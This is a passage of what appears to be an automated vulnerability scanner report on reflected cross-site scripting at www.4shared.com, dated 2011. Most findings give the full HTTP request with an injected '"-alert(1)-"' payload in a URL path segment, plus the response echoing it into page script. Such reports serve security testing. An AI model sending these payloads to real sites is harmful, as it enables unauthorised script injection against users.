Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons/16x1634cc4&quot;-alert(1)-&quot;8ad53ce0672/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=888C0178FF1052C414FDAA58E2CE5F49.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:39 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x1634cc4"-alert(1)-"8ad53ce0672/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

5.24. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cedc"-alert(1)-"98d34b98a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images4cedc&quot;-alert(1)-&quot;98d34b98a53/blueBanner_plus.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:37 GMT
Content-Length: 36227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

5.25. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/blueBanner_plus.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aef3a"-alert(1)-"93d664da704 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/blueBanner_plus.gifaef3a&quot;-alert(1)-&quot;93d664da704
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.26. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/index-premium-features.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8493f"-alert(1)-"1139657276e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images8493f"-alert(1)-"1139657276e/index-premium-features.png HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images8493f&quot;-alert(1)-&quot;1139657276e/index-premium-features.png
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:32 GMT
Content-Length: 36262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images8493f"-alert(1)-"1139657276e/index-premium-features.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

5.27. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/index-premium-features.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15de3"-alert(1)-"eb019ce0128 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index-premium-features.png15de3"-alert(1)-"eb019ce0128 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/index-premium-features.png15de3&quot;-alert(1)-&quot;eb019ce0128
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:43 GMT
Content-Length: 36251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/index-premium-features.png15de3"-alert(1)-"eb019ce0128";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.28. http://www.4shared.com/images/spacer.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d78a"-alert(1)-"1ddd3f867cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3d78a&quot;-alert(1)-&quot;1ddd3f867cb/spacer.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:37 GMT
Content-Length: 36182


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.29. http://www.4shared.com/images/spacer.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce9c3"-alert(1)-"bd60f50799e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/spacer.gifce9c3"-alert(1)-"bd60f50799e HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/spacer.gifce9c3&quot;-alert(1)-&quot;bd60f50799e
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36171


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/spacer.gifce9c3"-alert(1)-"bd60f50799e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.30. http://www.4shared.com/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e191f"-alert(1)-"6e354f00eec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.jspe191f"-alert(1)-"6e354f00eec HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /index.jspe191f&quot;-alert(1)-&quot;6e354f00eec
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77F2937069CCE87EA2E64BB3CD685400.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:37 GMT
Connection: close
Content-Length: 36108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/index.jspe191f"-alert(1)-"6e354f00eec";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.31. http://www.4shared.com/js/index.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab098"-alert(1)-"8cd6f08d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsab098"-alert(1)-"8cd6f08d9/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsab098&quot;-alert(1)-&quot;8cd6f08d9/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=57CB8FCED9A0A676750D873D115BEA0A.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsab098"-alert(1)-"8cd6f08d9/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.32. http://www.4shared.com/js/index.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa86"-alert(1)-"df4c1953dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/index.jsefa86"-alert(1)-"df4c1953dcc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/index.jsefa86&quot;-alert(1)-&quot;df4c1953dcc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDFBB8D835A68248C340B07013F288A2.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:33 GMT
Content-Length: 36818


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/index.jsefa86"-alert(1)-"df4c1953dcc";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.33. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55f12"-alert(1)-"f7aecd99122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js55f12"-alert(1)-"f7aecd99122/loginScript.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js55f12&quot;-alert(1)-&quot;f7aecd99122/loginScript.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3E73AECAF5C0BAC4CA79DF79445828D0.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:31 GMT
Content-Length: 36855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js55f12"-alert(1)-"f7aecd99122/loginScript.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

5.34. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de174"-alert(1)-"725a9c623ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/loginScript.jspde174"-alert(1)-"725a9c623ce?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jspde174&quot;-alert(1)-&quot;725a9c623ce
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=73266099C7D574540CC4E6F42B2C66F0.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:39 GMT
Content-Length: 36168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/loginScript.jspde174"-alert(1)-"725a9c623ce";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.35. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe0b9"-alert(1)-"c10b6d0808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsfe0b9&quot;-alert(1)-&quot;c10b6d0808b/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E24C1E87E4B669F1C8521481DBCB7839.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:29 GMT
Content-Length: 36876


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

5.36. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd94"-alert(1)-"07633452741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/signup-script.jsp8cd94"-alert(1)-"07633452741?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp8cd94&quot;-alert(1)-&quot;07633452741
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A2D2D02377B86E002D082324E7FF1D94.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:37 GMT
Content-Length: 36172


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
